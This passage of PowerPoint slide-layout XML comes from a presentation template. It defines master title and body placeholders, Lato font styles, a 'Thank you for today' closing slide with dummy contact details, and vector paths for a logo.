            <a:off x="10798550" y="6539461"/>
            <a:ext cx="1097276" cy="163367"/>
            <a:chOff x="9041039" y="6539461"/>
            <a:chExt cx="1097276" cy="163367"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C85B862B-D630-6269-4DC5-EBE154BCE025}"/>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7" name="Freeform 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33584F34-F471-AFA9-53AB-38F39B3486F8}"/>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8" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5337169-B4C5-BA5C-F951-A79C1E824589}"/>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9" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16E9542F-14DC-1CB0-007D-F74C65545FF7}"/>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10" name="Freeform 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A5A3453-F3E8-769B-935A-390398D0095F}"/>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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2966115289"/>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_Light_Title">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="F9FFFF"/>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chemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>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tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBBF3957-34EA-349E-A1D8-E551347203C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="307640"/>
            <a:ext cx="11454980" cy="520642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4156981449"/>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ontent_Light_Title_Subhead">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="F9FFFF"/>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chemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>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tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49C1B5B4-04E9-30FC-34F9-C17DAFB434FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="350627" y="1135008"/>
            <a:ext cx="11472863" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="177800" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="344488" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="522288" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="690562"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7C76BA96-1D5A-5486-27FD-D114301FC9A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="307640"/>
            <a:ext cx="11454980" cy="520642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2020370518"/>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_Light_Title_Body">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="F9FFFF"/>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chemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>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tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26608C53-E4E6-1280-0DE8-7BF3E6F451BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396875" y="1411705"/>
            <a:ext cx="11472863" cy="4330283"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="-182880">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="-182880">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="-182880">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="-182880">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203"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itle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3E9C023-DB01-FC75-2B13-B2EEEB3377C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="307640"/>
            <a:ext cx="11454980" cy="520642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3257283155"/>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15_Content_Light_Title">
    <p:bg>
      <p:bgPr>
        <a:blipFill dpi="0" rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect l="-109000" r="70000"/>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346A107-B81E-46E5-B04A-B8126744DF42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4532890" y="1940169"/>
            <a:ext cx="4971673" cy="2318793"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="5400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Thank you</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>for today</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4454706D-908C-DB9E-E140-05DBD705B08B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4532890" y="5038517"/>
            <a:ext cx="4971673" cy="986916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="177800" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="344488" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="522288" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="690562" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Username@email.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>234-123-1234</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{296575ED-ADAE-3B06-3DC7-5460D28FDA18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9037195" y="462873"/>
            <a:ext cx="2699420" cy="400385"/>
            <a:chOff x="4488107" y="1762031"/>
            <a:chExt cx="1820226" cy="272415"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Freeform: Shape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB491191-51C2-89A7-B055-EF8FBB20DDED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5603484" y="1762031"/>
              <a:ext cx="360997" cy="272415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 272415"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 360997"/>
                <a:gd name="connsiteY1" fmla="*/ 136208 h 272415"/>
                <a:gd name="connsiteX2" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY2" fmla="*/ 272415 h 272415"/>
                <a:gd name="connsiteX3" fmla="*/ 274320 w 360997"/>
                <a:gd name="connsiteY3" fmla="*/ 137160 h 272415"/>
                <a:gd name="connsiteX4" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 272415"/>
                <a:gd name="connsiteX5" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY5" fmla="*/ 220028 h 272415"/>
                <a:gd name="connsiteX6" fmla="*/ 56198 w 360997"/>
                <a:gd name="connsiteY6" fmla="*/ 136208 h 272415"/>
                <a:gd name="connsiteX7" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY7" fmla="*/ 52388 h 272415"/>
                <a:gd name="connsiteX8" fmla="*/ 218123 w 360997"/>
                <a:gd name="connsiteY8" fmla="*/ 137160 h 272415"/>
                <a:gd name="connsiteX9" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY9" fmla="*/ 220028 h 272415"/>
                <a:gd name="connsiteX10" fmla="*/ 304800 w 360997"/>
                <a:gd name="connsiteY10" fmla="*/ 267653 h 272415"/>
                <a:gd name="connsiteX11" fmla="*/ 304800 w 360997"/>
                <a:gd name="connsiteY11" fmla="*/ 57150 h 272415"/>
                <a:gd name="connsiteX12" fmla="*/ 262890 w 360997"/>
                <a:gd name="connsiteY12" fmla="*/ 57150 h 272415"/>
                <a:gd name="connsiteX13" fmla="*/ 262890 w 360997"/>
                <a:gd name="connsiteY13" fmla="*/ 4763 h 272415"/>
                <a:gd name="connsiteX14" fmla="*/ 304800 w 360997"/>
                <a:gd name="connsiteY14" fmla="*/ 4763 h 272415"/>
                <a:gd name="connsiteX15" fmla="*/ 320040 w 360997"/>
                <a:gd name="connsiteY15" fmla="*/ 4763 h 272415"/>
                <a:gd name="connsiteX16" fmla="*/ 360998 w 360997"/>
                <a:gd name="connsiteY16" fmla="*/ 4763 h 272415"/>
                <a:gd name="connsiteX17" fmla="*/ 360998 w 360997"/>
                <a:gd name="connsiteY17" fmla="*/ 57150 h 272415"/>
                <a:gd name="connsiteX18" fmla="*/ 360998 w 360997"/>
                <a:gd name="connsiteY18" fmla="*/ 215265 h 272415"/>
                <a:gd name="connsiteX19" fmla="*/ 360998 w 360997"/>
                <a:gd name="connsiteY19" fmla="*/ 267653 h 272415"/>
                <a:gd name="connsiteX20" fmla="*/ 304800 w 360997"/>
                <a:gd name="connsiteY20" fmla="*/ 267653 h 272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0997" h="272415">
                  <a:moveTo>
                    <a:pt x="137160" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="61913" y="0"/>
                    <a:pt x="0" y="60960"/>
                    <a:pt x="0" y="136208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="211455"/>
                    <a:pt x="60960" y="272415"/>
                    <a:pt x="137160" y="272415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212407" y="272415"/>
                    <a:pt x="274320" y="211455"/>
                    <a:pt x="274320" y="137160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273368" y="60008"/>
                    <a:pt x="213360" y="0"/>
                    <a:pt x="137160" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="137160" y="220028"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="80963" y="220028"/>
                    <a:pt x="56198" y="171450"/>
                    <a:pt x="56198" y="136208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56198" y="100965"/>
                    <a:pt x="80963" y="52388"/>
                    <a:pt x="137160" y="52388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196215" y="52388"/>
                    <a:pt x="218123" y="104775"/>
                    <a:pt x="218123" y="137160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218123" y="171450"/>
                    <a:pt x="192405" y="220028"/>
                    <a:pt x="137160" y="220028"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="304800" y="267653"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="304800" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262890" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262890" y="4763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="4763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320040" y="4763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360998" y="4763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360998" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360998" y="215265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360998" y="267653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="267653"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00B3E7"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Freeform: Shape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FA3C98A-478B-1A6C-4A32-3DAD841E0448}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4488107" y="1766793"/>
              <a:ext cx="865822" cy="263842"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 260985 w 865822"/>
                <a:gd name="connsiteY0" fmla="*/ 262890 h 263842"/>
                <a:gd name="connsiteX1" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY1" fmla="*/ 262890 h 263842"/>
                <a:gd name="connsiteX2" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY2" fmla="*/ 210503 h 263842"/>
                <a:gd name="connsiteX3" fmla="*/ 317183 w 865822"/>
                <a:gd name="connsiteY3" fmla="*/ 210503 h 263842"/>
                <a:gd name="connsiteX4" fmla="*/ 317183 w 865822"/>
                <a:gd name="connsiteY4" fmla="*/ 157163 h 263842"/>
                <a:gd name="connsiteX5" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY5" fmla="*/ 157163 h 263842"/>
                <a:gd name="connsiteX6" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY6" fmla="*/ 104775 h 263842"/>
                <a:gd name="connsiteX7" fmla="*/ 317183 w 865822"/>
                <a:gd name="connsiteY7" fmla="*/ 104775 h 263842"/>
                <a:gd name="connsiteX8" fmla="*/ 317183 w 865822"/>
                <a:gd name="connsiteY8" fmla="*/ 52388 h 263842"/>
                <a:gd name="connsiteX9" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY9" fmla="*/ 52388 h 263842"/>
                <a:gd name="connsiteX10" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY10" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX11" fmla="*/ 260985 w 865822"/>
                <a:gd name="connsiteY11" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX12" fmla="*/ 260985 w 865822"/>
                <a:gd name="connsiteY12" fmla="*/ 262890 h 263842"/>
                <a:gd name="connsiteX13" fmla="*/ 123825 w 865822"/>
                <a:gd name="connsiteY13" fmla="*/ 164783 h 263842"/>
                <a:gd name="connsiteX14" fmla="*/ 60008 w 865822"/>
                <a:gd name="connsiteY14" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX15" fmla="*/ 0 w 865822"/>
                <a:gd name="connsiteY15" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX16" fmla="*/ 105728 w 865822"/>
                <a:gd name="connsiteY16" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX17" fmla="*/ 140970 w 865822"/>
                <a:gd name="connsiteY17" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX18" fmla="*/ 246698 w 865822"/>
                <a:gd name="connsiteY18" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX19" fmla="*/ 187643 w 865822"/>
                <a:gd name="connsiteY19" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX20" fmla="*/ 123825 w 865822"/>
                <a:gd name="connsiteY20" fmla="*/ 164783 h 263842"/>
                <a:gd name="connsiteX21" fmla="*/ 720090 w 865822"/>
                <a:gd name="connsiteY21" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX22" fmla="*/ 624840 w 865822"/>
                <a:gd name="connsiteY22" fmla="*/ 252413 h 263842"/>
                <a:gd name="connsiteX23" fmla="*/ 565785 w 865822"/>
                <a:gd name="connsiteY23" fmla="*/ 169545 h 263842"/>
                <a:gd name="connsiteX24" fmla="*/ 627698 w 865822"/>
                <a:gd name="connsiteY24" fmla="*/ 87630 h 263842"/>
                <a:gd name="connsiteX25" fmla="*/ 601980 w 865822"/>
                <a:gd name="connsiteY25" fmla="*/ 22860 h 263842"/>
                <a:gd name="connsiteX26" fmla="*/ 530543 w 865822"/>
                <a:gd name="connsiteY26" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX27" fmla="*/ 444818 w 865822"/>
                <a:gd name="connsiteY27" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX28" fmla="*/ 444818 w 865822"/>
                <a:gd name="connsiteY28" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX29" fmla="*/ 500063 w 865822"/>
                <a:gd name="connsiteY29" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX30" fmla="*/ 500063 w 865822"/>
                <a:gd name="connsiteY30" fmla="*/ 171450 h 263842"/>
                <a:gd name="connsiteX31" fmla="*/ 565785 w 865822"/>
                <a:gd name="connsiteY31" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX32" fmla="*/ 678180 w 865822"/>
                <a:gd name="connsiteY32" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX33" fmla="*/ 699135 w 865822"/>
                <a:gd name="connsiteY33" fmla="*/ 209550 h 263842"/>
                <a:gd name="connsiteX34" fmla="*/ 785813 w 865822"/>
                <a:gd name="connsiteY34" fmla="*/ 209550 h 263842"/>
